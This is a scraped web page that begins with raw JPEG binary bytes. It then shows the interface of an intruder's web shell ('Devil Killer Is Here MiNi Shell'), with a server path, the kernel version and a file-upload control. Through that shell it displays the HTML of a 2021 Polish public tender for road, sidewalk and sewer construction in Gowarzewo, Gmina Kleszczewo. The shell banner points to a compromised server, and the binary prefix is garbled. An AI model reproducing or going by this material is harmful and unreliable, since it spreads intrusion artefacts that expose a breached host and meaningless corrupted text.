JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210817/0015164501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa drogi wraz z chodnikami, zjazdami oraz kanalizacją - ul. Szałwiowa, Lawendowa w miejscowości Gowarzewo, Gmina Kleszczewo </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzą zamawiający działający wspólnie</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Kleszczewo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631258715</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Poznańska 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kleszczewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-005</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@kleszczewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kleszczewo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.8.) Informacje o pozostałych zamawiających działających wspólnie</h3> <h3 class="p-2 mt-4 bg-light">Zamawiający <span class="normal">2</span></h3> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Komunalny w Kleszczewie Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367672324</span></h3> <h3 class="mb-0">1.5) Adres zamawiającego</h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Sportowa 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kleszczewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-005</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk@zk.kleszczewo.pl</span></h3> <h3 class="mb-0 ">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zk.kleszczewo.pl</span></h3> <h3 class="mb-0">1.9.) Podział obowiązków – zamówienie wspólne</h3> <p class="mb-0">W trakcie realizacji zadania strony będą prowadzić koordynacje i nadzór nad Umową na<br/>wykonanie zadania w następującym zakresie:<br/>a. roboty budowlane związane z budową drogi, chodnika i zjazdów - Gmina;<br/>b. roboty budowlane związane z budową kanalizacji deszczowej - Gmina;<br/>c. roboty budowlane związane z budową kanalizacji sanitarnej w ul. Szałwiowej i Lawendowej –<br/>Spółka.<br/>Strony wyznaczają Gminę jako zamawiającego upoważnionego (zamawiającego<br/>wyznaczonego) do przygotowania i przeprowadzenia postępowania oraz udzielenia zamówienia<br/>w ich imieniu i na ich rzecz.<br/>Strony upoważniają Gminę do wykonywania wszelkich czynności związanych z przygotowaniem<br/>i przeprowadzeniem postępowania o udzielenie wspólnego zamówienia zastrzeżone w<br/>postępowaniu o udzielenie zamówienia publicznego do kompetencji kierownika zamawiającego,<br/>nie wyłączając reprezentowania Stron w postępowaniu odwoławczym i skargowym przed<br/>Krajową Izbą Odwoławczą i sądami powszechnymi.</p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa drogi wraz z chodnikami, zjazdami oraz kanalizacją - ul. Szałwiowa, Lawendowa w miejscowości Gowarzewo, Gmina Kleszczewo </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8d820de8-ff4c-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00151645</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00008811/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Budowa drogi wraz z chodnikami, zjazdami oraz kanalizacją - ul. Szałwiowa i Lawendowa w miejscowości Gowarzewo, Gmina Kleszczewo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/kleszczewo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim za pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/kleszczewo. Komunikacja między Zamawiającym a Wykonawcami<br/>odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do<br/>zamawiającego”.<br/>Zamawiający dopuszcza, opcjonalnie, komunikację za pośrednictwem poczty elektronicznej. Adres<br/>poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: urzad@kleszczewo.pl.<br/>3. Zamawiający będzie przekazywał Wykonawcom informacje za pośrednictwem<br/>platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany<br/>terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji<br/>“Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny<br/>wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego<br/>wykonawcy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">- stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>− komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux,<br/>lub ich nowsze wersje,<br/>− zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10.0,<br/>− włączona obsługa JavaScript,<br/>− zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>− Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>− Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>− akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na<br/>stronie internetowej pod linkiem w zakładce „Regulamin" oraz uznaje go za wiążący,<br/>− zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>7. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, w szczególności za sytuację, gdy Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”).<br/>Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy Prawo Zamówień Publicznych.<br/>8. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców" na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje <br/>9. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanej w SWZ.<br/>Oferta, wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane elektronicznym podpisem kwalifikowanym lub elektronicznym podpisem zaufanym lub elektronicznym podpisem osobistym (e-dowód). W procesie składania oferty, wniosku, w tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty Wykonawca składa bezpośrednio na dokumencie, który następnie<br/>przesyła do systemu. Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do złożenia oferty wynosi 150 MB, natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest:<br/>Urząd Gmina Kleszczewo w osobie Wójta Gminy Kleszczewo, ul. Poznańska 4, 63-005 Kleszczewo,<br/>mail: urzad@kleszczewo.pl, tel.: 061 817 60 17.<br/>2. W sprawach związanych z ochroną danych osobowych można kontaktować się z Inspektorem<br/>Ochrony Danych pod adresem e-mail: iod@kleszczewo.pl oraz na adres siedziby: 63-005 Kleszczewo<br/>przy ul. Poznańska 4.<br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego na „Rewitalizację stawu wraz z<br/>zagospodarowaniem terenu w Komornikach, gmina Kleszczewo” prowadzonym w trybie<br/>podstawowym, na podstawie art. 275 pkt 1 ustawy pzp oraz zawarcia umowy.<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Prawo zamówień publicznych.<br/>Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>5. Posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO .<br/>Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>6. Obowiązek podania przez Pani/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp.<br/>7. Pani/Pana dane osobowe nie będą przekazywane poza terytorium Europejskiego Obszaru<br/>Gospodarczego/do organizacji międzynarodowej.<br/>8. Pani/Pana dane nie będą podlegały zautomatyzowanemu podejmowaniu decyzji, w tym również<br/>profilowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje dwa zakresy prac:<br/>1) Zakres 1- budowa drogi, chodników i zjazdów oraz kanalizacji deszczowej;<br/>Droga. Zadanie obejmuje budowę drogi, chodników i zjazdów ul. Szałwiowej i Lawendowej w<br/>Gowarzewie. Projekt ul. Szałwiowej i Lawendowej wchodzi w skład szerszego projektu pt.<br/>"Projekt dróg, zjazdów i chodników na osiedlu mieszkaniowym w Gowarzewie w rejonie ulic<br/>Lawendowej, Waniliowej, Szałwiowej, Miętowej, Brzozowej i Trzeckiej Gmina Kleszczewo - etap<br/>II" oraz "Projekt dróg, zjazdów i chodników na osiedlu mieszkaniowym w Gowarzewie w rejonie<br/>ulic Lawendowej, Waniliowej, Szałwiowej, Miętowej, Brzozowej i Trzeckiej Gmina Kleszczewo -<br/>etap III". Zadanie obejmuje:<br/>- budowę odcinka drogi 4DG wraz ze zjazdami - ul. Szałwiowa od skrzyżowania z ul. Miętową do<br/>skrzyżowania z ul. Waniliową, wg projektu - etap II;<br/>- budowę drogi 11 DG i 10 DG wraz ze zjazdami - ul. Szałwiowa od skrzyżowania z ul. Waniliową<br/>i część ul. Lawendowej) wg projektu - etap III.<br/>Kanalizacja deszczowa. Projekt kanalizacji deszczowej objętej zamówieniem wchodzi w skład<br/>szerszego projektu pt: „Projekt budowlany kanalizacji deszczowej na osiedlu mieszkaniowym w<br/>Gowarzewie w rejonie ulic: Lawendowej, Waniliowej, Szałwiowej, Szafranowej, Miętowej,<br/>Brzozowej i Trzeckiej, Gmina Kleszczewo – etap II” oraz „Projekt budowlany kanalizacji<br/>deszczowej na osiedlu mieszkaniowym w Gowarzewie w rejonie ulic: Lawendowej, Waniliowej,<br/>Szałwiowej, Szafranowej, Miętowej, Brzozowej i Trzeckiej, Gmina Kleszczewo – etap III”.<br/>Zamówienie obejmuje:<br/>- wykonanie i podłączenie 2 wpustów ulicznych do istniejącej kanalizacji deszczowej<br/>wyprowadzonej z ulicy Miętowej poza obrys kostki pozbrukowej wraz ze studnią D27, wg<br/>projektu - etap II.<br/>- wykonanie kanalizacji deszczowej wraz z wpustami ulicznymi od D53 do D49 i D49 do D13, wg<br/>projektu -etap III.<br/>2) Zakres 2- budowa kanalizacji sanitarnej;<br/>Zakres zamówienia obejmuje budowę kanalizacji sanitarnej wraz z przyłączami w Gowarzewie w<br/>oparciu o dokumentację projektową oraz specyfikacje techniczne wykonania i odbioru robót<br/>budowlanych przedłożone przez Zamawiającego. Zamówienie realizowane jest w oparciu o<br/>dokumentację dotyczącą budowy kanalizacji sanitarnej wraz z przyłączami w ul. Lawendowej i<br/>Ogłoszenie nr 2021/BZP 00101646/01 z dnia 2021-07-01<br/>2021-07-01 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>Szałwiowej w miejscowości Gowarzewo, gm. Kleszczewo.<br/>W ramach zadania do realizacji jest budowa:<br/>- kanalizacji sanitarnej grawitacyjnej z rur PVC o średnicy 0,20 m i długości L=243,3m,<br/>- studni prefabrykowanych o średnicy 1000mm – szt. 7<br/>- przyłączy kanalizacji sanitarnej w pasie drogowym – 18 szt. z rur PVC, klasy o średnicy fi 0,16<br/>m i łącznej długości L=88,7 m<br/>Do obowiązków Wykonawcy należy także:<br/>a) uzyskanie wszelkich uzgodnień, zezwoleń i decyzji administracyjnych umożliwiających<br/>prowadzenie prac, o ile Zamawiający nie załączył ich do dokumentacji przetargowej;<br/>b) sporządzenie zestawienia wytworzonych środków trwałych oraz istniejących, których wartość<br/>uległa zmianie w wyniku realizacji zamówienia, wraz z ich charakterystyką (w zakresie<br/>uzgodnionym z Zamawiającym), zgodnie z obowiązującymi przepisami i dołączenie tego<br/>zestawienia do dokumentacji odbiorowej;<br/>c) uzyskanie pozwolenia na użytkowanie obiektu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233200-1 - Roboty w zakresie różnych nawierzchni</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień polegających na powtórzeniu<br/>podobnych robót budowlanych w oparciu o art. 214 ust. 1 pkt. 7 ustawy pzp, do wysokości 30%<br/>wartości zamówienia podstawowego i zgodnych z przedmiotem tego zamówienia. Zamówienie będzie<br/>mogło być udzielone w przypadku, gdy Zamawiający będzie dysponował środkami na jego realizację i<br/>na warunkach zgodnych z zamówieniem podstawowym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki<br/>udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>1. Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy, w tym okresie, wykonał: wykonał co najmniej 1 robotę budowlaną polegającą na<br/>budowie lub przebudowie drogi w zakresie konstrukcji drogi łącznie z nawierzchnią z kostki<br/>brukowej oraz kanalizacją deszczową lub sanitarną o wartości brutto nie mniejszej niż 1 000 000<br/>zł brutto.<br/>2. Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub<br/>będzie dysponował osobami zdolnymi do wykonania zamówienia, tj. m.in. odpowiedzialnymi za<br/>kierowanie robotami budowlanymi, posiadającymi uprawnienia budowlane w specjalności:<br/>- kierownik budowy - osoba posiadająca uprawnienia 